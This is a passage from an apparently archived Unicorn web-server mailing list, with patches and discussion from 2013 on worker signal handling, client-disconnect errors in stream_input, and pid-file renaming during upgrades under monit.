1) we (or our app) somehow called IO#close on one of the sockets
   we listen on without removing it from the readers array.
   We'll ignore IOErrors from IO#close and assume we wanted to
   close it.

2) our SIGQUIT handler is interrupted by itself.  This is currently
   not possible with (MRI) Ruby 2.x, but it may happen in other
   implementations (as it does in normal C code).
---
 lib/unicorn/http_server.rb | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index ae8ad13..2052d53 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -591,6 +591,13 @@ class Unicorn::HttpServer
   EXIT_SIGS = [ :QUIT, :TERM, :INT ]
   WORKER_QUEUE_SIGS = QUEUE_SIGS - EXIT_SIGS
 
+  def nuke_listeners!(readers)
+    # only called from the worker, ordering is important here
+    tmp = readers.dup
+    readers.replace([false]) # ensure worker does not continue ASAP
+    tmp.each { |io| io.close rescue nil } # break out of IO.select
+  end
+
   # gets rid of stuff the worker has no business keeping track of
   # to free some resources and drops all sig handlers.
   # traps for USR1, USR2, and HUP may be set in the after_fork Proc
@@ -618,7 +625,7 @@ class Unicorn::HttpServer
     @after_fork = @listener_opts = @orig_app = nil
     readers = LISTENERS.dup
     readers << worker
-    trap(:QUIT) { readers.each { |io| io.close }.replace([false]) }
+    trap(:QUIT) { nuke_listeners!(readers) }
     readers
   end
 
@@ -677,7 +684,7 @@ class Unicorn::HttpServer
       worker.tick = Time.now.to_i
       ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
     rescue => e
-      redo if nr < 0
+      redo if nr < 0 && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
     end while readers[0]
   end
-- 
1.8.5.3.368.gab0bcec
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 5%]

* Re: [PATCH] rework master-to-worker signaling to use a pipe
  @ 2013-12-10  1:58  4%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-12-10  1:58 UTC (permalink / raw)
  To: unicorn list

Sam Saffron <sam.saffron@gmail.com> wrote:
> Bottom line is that your change is not really required.

OK.  However, the other benefit of the change is that master process
death can be detected much sooner.  (The per-process open file limit
issue doesn't really bother me with my change, since the overall kernel
pipe usage does not change).

I suppose ruby-pg users can do something like:

	trap(:EXIT) { pg.cancel }

if they really want to be able to abort in-progress queries

> Thank you so much for being super responsive here.  Sorry if I caused
> you to go on a tangent you didn't need to go on.

No worries, I was already using a similar method to (only) detect master
process death in another master-worker server.  Anyways, there's nothing
pg-specific to it and I was always slightly worried signals would cause
some buggy code to behave incorrectly in the face of EINTR (though most of
C Ruby + extensions seem well-behaved in that regard).

So I'm likely to go forward with it (if not for unicorn 4.8, then 5.0)

Thanks for bringing this issue to everyone's attention.

^ permalink raw reply	[relevance 4%]

* Re: Issues with PID file renaming
  2013-11-26  1:00  3% Issues with PID file renaming Jimmy Soho
@ 2013-11-26  1:20  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-11-26  1:20 UTC (permalink / raw)
  To: unicorn list

Jimmy Soho <jimmy.soho@gmail.com> wrote:
> Hi Eric,
> 
> Since we upgraded from 4.6.2 to 4.7.0 we're regularly having issues
> where one or more unicorn master processes would not upgrade
> correctly, resulting in an (old) master process.
> 
> What I notice is the following: when upgrading with 4.6.2 the file
> unicorn.pid is copied to unicorn.pid.oldbin and the unicorn.pid file
> is updated (the (new) master process). After a while the worker pid
> files are updated and the unicorn.pid.oldbin file disappears, and all
> is fine.

Ugh.  This is what I feared...  Slow startup time of most Ruby web apps
doesn't help.

> When upgrading with 4.7.0 though the file unicorn.pid.oldbin is
> created, but there is no unicorn.pid file. After a while (when the new
> master process has finished initialising, and is ready to fork the
> workers) the worker pid files are updated and a unicorn.pid file
> appears, and then the unicorn.pid.oldbin file disappears.
> 
> So there is a relatively long period where there is no unicorn.pid file.
> 
> I think the problem for us is caused by monit, our process monitor,
> which monitors the unicorn.pid file:
> 
> check process unicorn with pidfile
> /srv/app.itrp-staging.com/shared/pids/unicorn.pid
>   start program = "/etc/init.d/unicorn start"
>   stop program = "/etc/init.d/unicorn stop"
>   ...

Is there an alternate way to monitor unicorn with monit?
But I'd like to keep your case working if possible.

> Because the unicorn.pid file is absent for a relatively long period
> monit will try to start unicorn, while an upgrade is in progress.
> (which might be another issue: the start action should recognise a
> start or upgrade process is already underway; sadly this check too
> relies on the existence of the unicorn.pid file)
> 
> I think the way 4.6.2 worked is better. There should be a pid file for
> the new master process the moment it's created.

> What do you think?

How about having the old process create a hard link to .oldbin, and
having the new one overwrite the pid file if Process.ppid matches the
PID recorded in it?  The check is still racy, but that's what pid files
are :<
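The hard-link handoff can be sketched with plain File operations
(hypothetical PID values; this is not unicorn's actual code):

```ruby
require 'tmpdir'

results = Dir.mktmpdir do |dir|
  pid_path = File.join(dir, 'unicorn.pid')
  File.write(pid_path, '1000')              # old master's PID

  # old master, on USR2: hard link instead of rename, so unicorn.pid
  # never vanishes during the upgrade window
  File.link(pid_path, "#{pid_path}.oldbin")
  still_there = File.exist?(pid_path)       # monit keeps seeing a pid file

  # new master, once ready: take over only if the file still names our
  # parent (Process.ppid in real code; 1000 in this sketch)
  File.write(pid_path, '2000') if File.read(pid_path).to_i == 1000
  [still_there, File.read(pid_path)]
end
puts results.inspect # => [true, "2000"]
```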

^ permalink raw reply	[relevance 0%]

* Issues with PID file renaming
@ 2013-11-26  1:00  3% Jimmy Soho
  2013-11-26  1:20  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jimmy Soho @ 2013-11-26  1:00 UTC (permalink / raw)
  To: mongrel-unicorn

Hi Eric,

Since we upgraded from 4.6.2 to 4.7.0 we're regularly having issues
where one or more unicorn master processes would not upgrade
correctly, resulting in an (old) master process.

What I notice is the following: when upgrading with 4.6.2 the file
unicorn.pid is copied to unicorn.pid.oldbin and the unicorn.pid file
is updated (the (new) master process). After a while the worker pid
files are updated and the unicorn.pid.oldbin file disappears, and all
is fine.

When upgrading with 4.7.0 though the file unicorn.pid.oldbin is
created, but there is no unicorn.pid file. After a while (when the new
master process has finished initialising, and is ready to fork the
workers) the worker pid files are updated and a unicorn.pid file
appears, and then the unicorn.pid.oldbin file disappears.

So there is a relatively long period where there is no unicorn.pid file.

I think the problem for us is caused by monit, our process monitor,
which monitors the unicorn.pid file:

check process unicorn with pidfile
/srv/app.itrp-staging.com/shared/pids/unicorn.pid
  start program = "/etc/init.d/unicorn start"
  stop program = "/etc/init.d/unicorn stop"
  ...

Because the unicorn.pid file is absent for a relatively long period
monit will try to start unicorn, while an upgrade is in progress.
(which might be another issue: the start action should recognise a
start or upgrade process is already underway; sadly this check too
relies on the existence of the unicorn.pid file)

I think the way 4.6.2 worked is better. There should be a pid file for
the new master process the moment it's created.

What do you think?

-- 
Jim

* Re: Handling closed clients
       [not found]           ` <m21u2sjpc9.fsf@macdaddy.atl.damballa>
@ 2013-11-07 16:48  0%         ` Eric Wong
  2013-11-07 20:22  0%           ` [PATCH] stream_input: avoid IO#close on client disconnect Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-11-07 16:48 UTC (permalink / raw)
  To: Andrew Hobson; +Cc: mongrel-unicorn

Andrew Hobson <ahobson@gmail.com> wrote:
> Eric Wong <normalperson@yhbt.net> writes:
> 
> > (Please don't cull Cc:, I'm assuming you're not subscribed to the
> >  mailing list since we don't require subscriptions)
> 
> Sorry, that was unintentional.

No worries, and it is good to also send a copy to each recipient in the
thread in case Rubyforge is down (like it is right now).  If it stays
down, I'll have to find/make a replacement myself.

...And move to something more decentralized and resilient to downtime
while I'm at it.

> > With my proposed patch to eliminate IO#close from StreamInput,
> > this test is no longer an accurate representation of unicorn behavior.
> 
> I applied that one line patch a day and a half ago and we haven't seen
> the error in the field (yet). I am optimistic you have elegantly fixed
> the problem.
> 
> If we do see an error, I will send another email to the list.
> 
> Thanks again for your help,

No problem, I'll push that out later today.

* Re: Handling closed clients
       [not found]       ` <m2iow6k7nk.fsf@macdaddy.atl.damballa>
@ 2013-11-05 20:51  7%     ` Eric Wong
       [not found]           ` <m21u2sjpc9.fsf@macdaddy.atl.damballa>
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-11-05 20:51 UTC (permalink / raw)
  To: Andrew Hobson; +Cc: mongrel-unicorn

(Please don't cull Cc:, I'm assuming you're not subscribed to the
 mailing list since we don't require subscriptions)

Andrew Hobson <ahobson@gmail.com> wrote:
> Eric Wong <normalperson@yhbt.net> writes:
> 
> > Those clients should really be hitting nginx, first.
> 
> I apologize for not being clear.  They are hitting apache first.

Heh, just as bad, since I'm not aware of any Apache config which will
protect unicorn from slow clients.

> > Fwiw, wrapping the app in Unicorn::PrereadInput middleware may help in
> > this situation if you're dealing with a buggy local client.
> 
> Hmm, I might give that a try.

I expect that to consolidate your errors in one place, and your
application won't try to write errors itself.
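For reference, a minimal config.ru sketch of the middleware suggestion
above (the app constant is a placeholder):

```ruby
# config.ru -- buffer the entire request body before app dispatch,
# so a slow or broken upload fails in one well-defined place instead
# of mid-request inside the application.
require 'unicorn/preread_input'
use Unicorn::PrereadInput
run MyApp # placeholder for your Sinatra/Rack application
```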

But yeah, you're still opening up yourself to slow clients limiting
your concurrency without nginx.

> > IOError usually means an attempt to use the socket when it was already
> > closed (possibly after it hit ECONNRESET/EPIPE/ENOTCONN).
> >
> > The only place we close the client socket where it might be visible to a
> > Rack app is in the eof! method of StreamInput.  Based on what I'm
> > reading, this is what's happening.
> 
> Our application does not use the socket directly. It is a relatively
> simple sinatra application that is accepting a file upload. As far as I
> can tell from putting in some debugging statements in our code, the
> error happens when we return a 400 error status when certain parameters
> are missing.

Right, however your upload processing will indirectly trigger socket
reads: env["rack.input"].read -> Unicorn::StreamInput#eof! ->
Unicorn::ClientShutdown.

> I should have included this before, so here's an example stack trace
> (using a pre-release gem with the fixes from 24b9f66dcdda44378b4053645333ce9ce336b413):
> 
> ERROR -- : app error: closed stream (IOError)
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_response.rb:53:in `write'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_response.rb:53:in `http_response_write'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_server.rb:563:in `process_client'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_server.rb:633:in `worker_loop'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_server.rb:500:in `spawn_missing_workers'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_server.rb:511:in `maintain_worker_count'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_server.rb:277:in `join'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/bin/unicorn:126:in `<top (required)>'
> ERROR -- : bin/unicorn:21:in `load'
> ERROR -- : bin/unicorn:21:in `<main>'

Yep, I had your stack trace in my mind already :)

> So it looks to me like what happens is that unicorn tries to write to
> the socket to report the error and then it hits a generic IOError,
> possibly from kgio:
> 
> http://bogomips.org/kgio.git/tree/ext/kgio/my_fileno.h#n34

Yes, but it would really happen from anything which attempted to
use the socket.

> > However, lately, I'm thinking merely calling .shutdown on the socket is
> > sufficient (patch below), and the close just confuses things.
> 
> I tried it out on my test case below.
> 
> > The Rack application should _always_ be trapping exceptions it
> > generates, including DB.  Where we log "app error" is only to tell the
> > app author to fix their code and prevent a buggy app from completely
> > breaking a worker.
> 
> I agree that applications should be trapping exceptions. I speculated
> that the change is "incompatible" because now buggy applications that
> raise EOFError will not report a 500 error. In fact, they won't return
> anything at all. Maybe that's ok, but it seems like a pretty big change.
> Or maybe I am misunderstanding entirely.

Applications need to be aware of what raises EOFError.  An application
would handle it differently depending on whether it came from a backend
connection it made or from a client disconnect (Unicorn::ClientShutdown).

Since Unicorn::ClientShutdown is a subclass of EOFError, that should
make things a little easier to distinguish (but unfortunately, forces
some client code to be Unicorn-specific).
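In application code, that distinction might look like the sketch below
(the Unicorn::ClientShutdown stand-in is defined only so the sketch runs
without the unicorn gem; the real class ships with unicorn):

```ruby
# Stand-in for the real class shipped with unicorn, where
# Unicorn::ClientShutdown < EOFError.
module Unicorn
  ClientShutdown = Class.new(EOFError) unless defined?(ClientShutdown)
end

# Rescue the subclass first: a client disconnect is not worth a 500,
# but an EOFError from one of our own backend connections should still
# propagate and be logged as an app error.
def read_body(env)
  env['rack.input'].read
rescue Unicorn::ClientShutdown
  nil   # client hung up mid-upload; nothing useful to send back
end
```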

> > Your patch is badly whitespace mangled so I can't apply it.
> 
> Please accept my apologies for the sloppiness. I have included a non
> mangled version below.
> 
> I think the test case I added called test_file_streamed_request_close
> accurately reproduces the situation we are encountering, even though it
> does so in a very heavy handed way.  The change to handle_error fixes
> the test case, but it does change the behavior of another test case.
> 
> > Anyways, I think closing the socket while app dispatch is running
> > is sufficient to avoid IOError (you'll end up hitting ENOTCONN
> > instead, I think).
> 
> I applied the patch, but it does not fix the
> test_file_streamed_request_close test case I have created.

Right.  The socket is no longer closed with my patch, so
your test case does not reproduce what unicorn might do internally.

> Thank you for your feedback,
> 
> diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
> index 402f133..3620427 100644
> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -547,8 +547,6 @@ class Unicorn::HttpServer
>    # the socket is closed at the end of this function
>    def handle_error(client, e)
>      code = case e
> -    when EOFError,Errno::ECONNRESET,Errno::EPIPE,Errno::ENOTCONN
> -      # client disconnected on us and there's nothing we can do

Removing this is bad, at least the Errno::* portions since
we might be outside of app dispatch and log_error would spew
a backtrace for every single dropped/incomplete connection
(this is still an issue on a LAN for me, but I use the worst LANs in
the world :x)

I'm trying to minimize the places we call IO#close on the socket,
since we'll trigger IOError in other places (as you've experienced).

>      when Unicorn::RequestURITooLongError
>        414
>      when Unicorn::RequestEntityTooLargeError
> @@ -556,8 +554,12 @@ class Unicorn::HttpServer
>      when Unicorn::HttpParserError # try to tell the client they're bad
>        400
>      else
> -      Unicorn.log_error(@logger, "app error", e)
> -      500
> +      if client.closed?
> +        # client disconnected on us and there's nothing we can do
> +      else
> +        Unicorn.log_error(@logger, "app error", e)
> +        500
> +      end
>      end
>      if code
>        client.kgio_trywrite(err_response(code, @request.response_start_sent))

In other words, your change to handle_error would fail the following case:

--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -265,4 +267,29 @@ class WebServerTest < Test::Unit::TestCase
   def test_listener_names
     assert_equal [ "127.0.0.1:#@port" ], Unicorn.listener_names
   end
+
+  def test_eof_headers
+    teardown
+    app = lambda { |env| [200, {}, []] }
+    redirect_test_io do
+      @server = HttpServer.new(app, :listeners => [ "127.0.0.1:#@port"] )
+      @server.start
+    end
+
+    sock = TCPSocket.new('127.0.0.1', @port)
+    sock.syswrite("GET / HTTP/1.0\r\n") # partial request
+    sock.shutdown
+    assert_raises(EOFError) { sock.readpartial(666) }
+    sock.close
+
+    # just send another complete request to ensure the log message from the
+    # first (failed) request is flushed out to FS
+    sock = TCPSocket.new('127.0.0.1', @port)
+    sock.syswrite("GET / HTTP/1.0\r\n\r\n")
+    assert_match %r{200 OK}, sock.read
+    sock.close
+
+    lines = File.readlines("test_stderr.#$$.log")
+    assert lines.grep(/app error:/).empty?
+  end
 end

(I thought we already had a test for this, but apparently not..)

> diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
> index e5b335f..2fca1b4 100644
> --- a/test/unit/test_server.rb
> +++ b/test/unit/test_server.rb
> @@ -145,8 +145,7 @@ class WebServerTest < Test::Unit::TestCase
>      # processing on us even during app dispatch
>      sock.shutdown(Socket::SHUT_WR)
>      IO.select([sock], nil, nil, 60) or raise "Timed out"
> -    buf = sock.read
> -    assert_equal "", buf
> +    assert_match %r{\AHTTP/1.[01] 500\b}, sock.sysread(4096)

I don't agree with this at all.  500 means something in the server
broke, but in this case the _client_ broke.

>      next_client = Net::HTTP.get(URI.parse("http://127.0.0.1:#@port/"))
>      assert_equal 'hello!\n', next_client
>      lines = File.readlines("test_stderr.#$$.log")
> @@ -265,4 +264,55 @@ class WebServerTest < Test::Unit::TestCase
>    def test_listener_names
>      assert_equal [ "127.0.0.1:#@port" ], Unicorn.listener_names
>    end
> +
> +  # ensure that EOFError from client code is not ignored
> +  def test_eof_app
> +    teardown
> +    app = lambda { |env| raise EOFError }
> +    # [200, {}, []] }
> +    redirect_test_io do
> +      @server = HttpServer.new(app, :listeners => [ "127.0.0.1:#@port"] )
> +      @server.start
> +    end

I don't think defining behavior here is good (other than being able to
handle subsequent, unrelated requests with the process).  This is an
application bug if the app can't handle the exceptions it raises.

> +    sock = TCPSocket.new('127.0.0.1', @port)
> +    sock.syswrite("GET / HTTP/1.0\r\n\r\n")
> +    assert_match %r{\AHTTP/1.[01] 500\b}, sock.sysread(4096)
> +    assert_nil sock.close
> +    lines = File.readlines("test_stderr.#$$.log")
> +    assert lines.grep(/app error:/)
> +  end
> +
> +  def test_file_streamed_request_close
> +    teardown
> +    # do a funky dance so that the socket is closed partway though the request
> +    tmp = Tempfile.new('test_file_streamed_request_close')
> +    app = lambda { |env|
> +      while File.zero?(tmp.path)
> +        sleep(0.2)
> +      end
> +      tmp.unlink
> +      o = env['rack.input'].instance_variable_get(:@socket)
> +      o.close

With my proposed patch to eliminate IO#close from StreamInput,
this test is no longer an accurate representation of unicorn behavior.

> +      hdrs = { 'Content-Type' => 'text/plain' }
> +      [ 200, hdrs, [ "#$$\n" ] ]
> +    }
> +    # [200, {}, []] }
> +    redirect_test_io do
> +      @server = HttpServer.new(app, :listeners => [ "127.0.0.1:#@port"] )
> +      @server.start
> +    end
> +    sock = TCPSocket.new('127.0.0.1', @port)
> +    body = "a" * 10
> +    long = "PUT /test HTTP/1.1\r\nContent-length: #{body.length + 10}\r\n\r\n" + body
> +    sock.syswrite(long)
> +    sock.close
> +    tmp.puts "ok"
> +    tmp.flush
> +    while File.exists?(tmp.path)
> +      sleep(0.2)
> +    end
> +    lines = File.readlines("test_stderr.#$$.log")
> +    assert lines.grep(/app error:/).empty?
> +  end
> +
>  end

* [PATCH] stream_input: avoid IO#close on client disconnect
  2013-11-07 16:48  0%         ` Eric Wong
@ 2013-11-07 20:22  0%           ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-11-07 20:22 UTC (permalink / raw)
  To: Andrew Hobson; +Cc: mongrel-unicorn

Eric Wong <normalperson@yhbt.net> wrote:
> Andrew Hobson <ahobson@gmail.com> wrote:
> > I applied that one line patch a day and a half ago and we haven't seen
> > the error in the field (yet). I am optimistic you have elegantly fixed
> > the problem.
> > 
> > If we do see an error, I will send another email to the list.
> > 
> > Thanks again for your help,
> 
> No problem, I'll push that out later today.

Pushed, thanks again:

>From f4005d5efc608e7d75371f0d0527041facd33f89 Mon Sep 17 00:00:00 2001
From: Eric Wong <normalperson@yhbt.net>
Date: Thu, 7 Nov 2013 20:10:01 +0000
Subject: [PATCH] stream_input: avoid IO#close on client disconnect

This can avoid IOError from being seen by the application, and also
reduces points where IO#close may be called.  This is a good thing
if we eventually port this code into a low-level server like
cmogstored where per-client memory space is defined by FD number of
a client.

Reported-by: Andrew Hobson <ahobson@gmail.com>
---
 lib/unicorn/stream_input.rb | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index c8a4240..9278f47 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -139,10 +139,7 @@ private
     # we do support clients that shutdown(SHUT_WR) after the
     # _entire_ request has been sent, and those will not have
     # raised EOFError on us.
-    if @socket
-      @socket.shutdown
-      @socket.close
-    end
+    @socket.shutdown if @socket
   ensure
     raise Unicorn::ClientShutdown, "bytes_read=#{@bytes_read}", []
   end
-- 
1.8.4.483.g7fe67e6.dirty

* Re: pid file handling issue
  2013-10-24 17:51  0%       ` Michael Fischer
@ 2013-10-24 18:21  0%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-10-24 18:21 UTC (permalink / raw)
  To: unicorn list

Michael Fischer <mfischer@zendesk.com> wrote:
> On Wed, Oct 23, 2013 at 7:03 PM, Eric Wong <normalperson@yhbt.net> wrote:
> 
> >> > I read and stash the value of the pid file before issuing any USR2.
> >> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
> >> > to ensure it's dead.
> >>
> >> That's inherently racy; another process can claim the old PID in the interim.
> >
> > Right, but raciness goes for anything regarding pid files.
> >
> > The OS does make an effort to avoid recycling PIDs too often,
> > and going through all the PIDs in a system quickly is
> > probably rare.  I haven't hit it, at least.
> 
> That's not good enough.
> 
> The fact that the pid file contains a pid is immaterial to me; I don't
> even need to look at it.  I only care about when it was created, or
> what its inode number is, so that I can detect whether Unicorn was
> last successfully started or restarted.  rename(2) is atomic per POSIX
> and is not subject to race conditions.

Right, we looked at using rename last year, but I didn't think it was
possible given we need to write the pid file before binding new listen
sockets:

  http://mid.gmane.org/20121127215146.GA23452@dcvr.yhbt.net

But perhaps we can drop the pid file late iff ENV["UNICORN_FD"] is
detected.  I'll see if that can be done w/o breaking compatibility.

> >> > Checking the mtime of the pidfile is really bizarre...
> >>
> >> Perhaps (though it's a normative criticism), but on the other hand, it
> >> isn't subject to the race above.
> >
> > It's still racy in a different way, though (file could change right
> > after checking).
> 
> If the file's mtime or inode number changes under my proposal, that
> means the reload must have been successful.   What race condition are
> you referring to that would render this conclusion inaccurate?

It doesn't mean the process didn't exit/crash right after writing the PID.

> > Having the process start time in /proc be unreliable because the server
> > has the wrong time is also in the same category of corner cases.
> 
> This is absolutely not true.  A significant minority, if not a
> majority, of servers will have at least slightly inaccurate wall
> clocks on boot.  This is usually corrected during boot by an NTP sync,
> but by then the die has already been cast insofar as ps(1) output is
> concerned.

But NTP syncs early in the boot process before most processes (including
unicorn) are started.  It shouldn't matter, then, right?

> > Also, can you check the inode of the /proc/$pid entry?  Perhaps
> 
> That's not portable.
> 
> > PID files are horrible, really :<
> 
> To reiterate, I'm not using the PID file in this instance to determine
> Unicorn's PID.  It could be empty, for all I care.

OK.  I assume you do the same for nginx?

* Re: pid file handling issue
  2013-10-24  2:03  0%     ` Eric Wong
@ 2013-10-24 17:51  0%       ` Michael Fischer
  2013-10-24 18:21  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2013-10-24 17:51 UTC (permalink / raw)
  To: unicorn list

On Wed, Oct 23, 2013 at 7:03 PM, Eric Wong <normalperson@yhbt.net> wrote:

>> > I read and stash the value of the pid file before issuing any USR2.
>> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
>> > to ensure it's dead.
>>
>> That's inherently racy; another process can claim the old PID in the interim.
>
> Right, but raciness goes for anything regarding pid files.
>
> The OS does make an effort to avoid recycling PIDs too often,
> and going through all the PIDs in a system quickly is
> probably rare.  I haven't hit it, at least.

That's not good enough.

The fact that the pid file contains a pid is immaterial to me; I don't
even need to look at it.  I only care about when it was created, or
what its inode number is, so that I can detect whether Unicorn was
last successfully started or restarted.  rename(2) is atomic per POSIX
and is not subject to race conditions.

>> > Checking the mtime of the pidfile is really bizarre...
>>
>> Perhaps (though it's a normative criticism), but on the other hand, it
>> isn't subject to the race above.
>
> It's still racy in a different way, though (file could change right
> after checking).

If the file's mtime or inode number changes under my proposal, that
means the reload must have been successful.   What race condition are
you referring to that would render this conclusion inaccurate?

> Having the process start time in /proc be unreliable because the server
> has the wrong time is also in the same category of corner cases.

This is absolutely not true.  A significant minority, if not a
majority, of servers will have at least slightly inaccurate wall
clocks on boot.  This is usually corrected during boot by an NTP sync,
but by then the die has already been cast insofar as ps(1) output is
concerned.

> Also, can you check the inode of the /proc/$pid entry?  Perhaps

That's not portable.

> PID files are horrible, really :<

To reiterate, I'm not using the PID file in this instance to determine
Unicorn's PID.  It could be empty, for all I care.

--Michael

* Re: Forking non web processes
  @ 2013-10-24 16:25  6%   ` Alex Sharp
  0 siblings, 0 replies; 200+ results
From: Alex Sharp @ 2013-10-24 16:25 UTC (permalink / raw)
  To: unicorn list

On Thu, Oct 24, 2013 at 9:17 AM, Eric Wong <normalperson@yhbt.net> wrote:
> I'm also wondering why... sidekiq/resque are standalone daemons
> themselves.  Shouldn't that be done as part of the deploy/init process?
> (unicorn isn't going to become init/upstart/systemd)

Agree with Eric here. You probably want to run unicorn and sidekiq /
resque in a way that they're not coupled to one another. They should
have different startup scripts and monitoring properties. And
eventually you may want to move your background worker processes to
another machine.

- alex sharp

* Re: pid file handling issue
  2013-10-24  1:01  4%   ` Michael Fischer
@ 2013-10-24  2:03  0%     ` Eric Wong
  2013-10-24 17:51  0%       ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-10-24  2:03 UTC (permalink / raw)
  To: unicorn list

Michael Fischer <mfischer@zendesk.com> wrote:
> On Wed, Oct 23, 2013 at 5:53 PM, Eric Wong <normalperson@yhbt.net> wrote:
> 
> > I read and stash the value of the pid file before issuing any USR2.
> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
> > to ensure it's dead.
> 
> That's inherently racy; another process can claim the old PID in the interim.

Right, but raciness goes for anything regarding pid files.

The OS does make an effort to avoid recycling PIDs too often,
and going through all the PIDs in a system quickly is
probably rare.  I haven't hit it, at least.

> > Checking the mtime of the pidfile is really bizarre...
> 
> Perhaps (though it's a normative criticism), but on the other hand, it
> isn't subject to the race above.

It's still racy in a different way, though (file could change right
after checking).

> > OTOH, there's times when users accidentally remove a pid
> > file and regenerate by hand it from ps(1), too...
> 
> Sure, but (a) that's a corner case I'm not particularly concerned
> about, and (b) it wouldn't cause any problems, assuming the user did
> this before any reload attempt, and not in the middle or something.

Having the process start time in /proc be unreliable because the server
has the wrong time is also in the same category of corner cases.

Also, can you check the inode of the /proc/$pid entry?  Perhaps

PID files are horrible, really :<

* Re: pid file handling issue
  2013-10-24  0:53  0% ` Eric Wong
@ 2013-10-24  1:01  4%   ` Michael Fischer
  2013-10-24  2:03  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2013-10-24  1:01 UTC (permalink / raw)
  To: unicorn list

On Wed, Oct 23, 2013 at 5:53 PM, Eric Wong <normalperson@yhbt.net> wrote:

> I read and stash the value of the pid file before issuing any USR2.
> Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
> to ensure it's dead.

That's inherently racy; another process can claim the old PID in the interim.

> Checking the mtime of the pidfile is really bizarre...

Perhaps (though it's a normative criticism), but on the other hand, it
isn't subject to the race above.

> OTOH, there are times when users accidentally remove a pid
> file and regenerate it by hand from ps(1), too...

Sure, but (a) that's a corner case I'm not particularly concerned
about, and (b) it wouldn't cause any problems, assuming the user did
this before any reload attempt, and not in the middle or something.

--Michael

* Re: pid file handling issue
  2013-10-23 22:55  4% pid file handling issue Michael Fischer
@ 2013-10-24  0:53  0% ` Eric Wong
  2013-10-24  1:01  4%   ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-10-24  0:53 UTC (permalink / raw)
  To: unicorn list

Michael Fischer <mfischer@zendesk.com> wrote:
> Hi everyone,
> 
> While writing a script to determine the success or failure of a
> Unicorn reload attempt (without having to parse a log), I noticed that
> Unicorn doesn't preserve the timestamp of its pid file.  In other
> words, instead of renaming pidfile to pidfile.oldbin (and then back
> again if the reload failed), it creates a new pid file for each master
> phase change.
> 
> This means we cannot simply compare the mtime of the current pidfile
> against the time the USR2 signal was given in order to make a
> reasonable conclusion.
> 
> I tried another method, which was to look at the start time of the
> process as reported by ps(1), but on Linux, that time does not come
> from the wall clock: it's derived from the number of jiffies since
> system boot.  So it's not guaranteed to be accurate, especially if the
> wall clock was incorrect at system boot.
> 
> Are there any other methods anyone can suggest?  Otherwise, a change
> to Unicorn's behavior with respect to pid file maintenance would be
> kindly appreciated.

I read and stash the value of the pid file before issuing any USR2.
Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
to ensure it's dead.
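A sketch of that stash-then-verify flow in Ruby (helper name invented;
signal 0 performs no delivery and only checks that the pid exists):

```ruby
# Record the old master's pid before sending USR2; after sending
# SIGQUIT, confirm the old master actually exited.
def old_master_gone?(stashed_pid)
  Process.kill(0, stashed_pid)
  false               # still running (or, rarely, the pid was recycled)
rescue Errno::ESRCH
  true                # no such process: the old master is gone
rescue Errno::EPERM
  false               # a process exists but belongs to another user
end
```

As discussed above, pid recycling makes even this racy; it only shrinks
the window.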

Checking the mtime of the pidfile is really bizarre...

OTOH, there are times when users accidentally remove a pid
file and regenerate it by hand from ps(1), too...

* pid file handling issue
@ 2013-10-23 22:55  4% Michael Fischer
  2013-10-24  0:53  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2013-10-23 22:55 UTC (permalink / raw)
  To: mongrel-unicorn

Hi everyone,

While writing a script to determine the success or failure of a
Unicorn reload attempt (without having to parse a log), I noticed that
Unicorn doesn't preserve the timestamp of its pid file.  In other
words, instead of renaming pidfile to pidfile.oldbin (and then back
again if the reload failed), it creates a new pid file for each master
phase change.

This means we cannot simply compare the mtime of the current pidfile
against the time the USR2 signal was given in order to make a
reasonable conclusion.

I tried another method, which was to look at the start time of the
process as reported by ps(1), but on Linux, that time does not come
from the wall clock: it's derived from the number of jiffies since
system boot.  So it's not guaranteed to be accurate, especially if the
wall clock was incorrect at system boot.

Are there any other methods anyone can suggest?  Otherwise, a change
